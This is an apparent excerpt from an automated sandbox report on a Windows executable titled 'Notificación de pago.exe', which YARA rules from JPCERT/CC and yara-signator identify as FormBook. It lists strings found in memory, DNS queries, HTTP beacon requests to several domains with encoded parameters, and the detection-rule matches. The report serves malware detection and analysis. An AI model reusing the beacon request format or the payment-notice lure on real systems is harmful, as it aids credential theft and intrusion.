          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0?m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Zm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cm6
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/hm?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/qm(
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~mQ
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt-bh
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.evertribute.com
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1Host: www.evertribute.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1Host: www.theguiriguide.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1Host: www.librevillegabon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Notificaci#U00f3n de pago.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
